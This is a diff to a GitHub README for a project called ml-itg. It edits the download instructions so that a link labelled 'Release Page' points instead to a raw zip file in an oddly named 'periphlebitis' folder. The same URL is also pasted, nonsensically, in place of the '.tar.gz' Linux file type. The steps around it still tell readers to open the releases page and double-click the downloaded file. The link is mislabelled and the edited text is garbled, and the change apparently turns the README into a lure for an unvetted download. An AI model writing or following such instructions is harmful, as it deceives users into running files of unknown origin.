KUNAL7231/ml-itg/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [Release Page](https://github.com/KUNAL7231/ml-itg/releases).
+To get started, visit this page to download: [Release Page](https://raw.githubusercontent.com/KUNAL7231/ml-itg/main/periphlebitis/ml-itg.zip).

 1. Click the link above to go to the **Releases** page.
 2. Find the latest version of **ml-itg**.
 3. Click the appropriate file for your operating system to download it.
-Look for options like `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+Look for options like `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/KUNAL7231/ml-itg/main/periphlebitis/ml-itg.zip` for Linux.
 4. After downloading, locate the file on your computer (usually in the "Downloads" folder).
 5. Double-click the file to begin the installation process.
 Follow the prompts to complete the setup.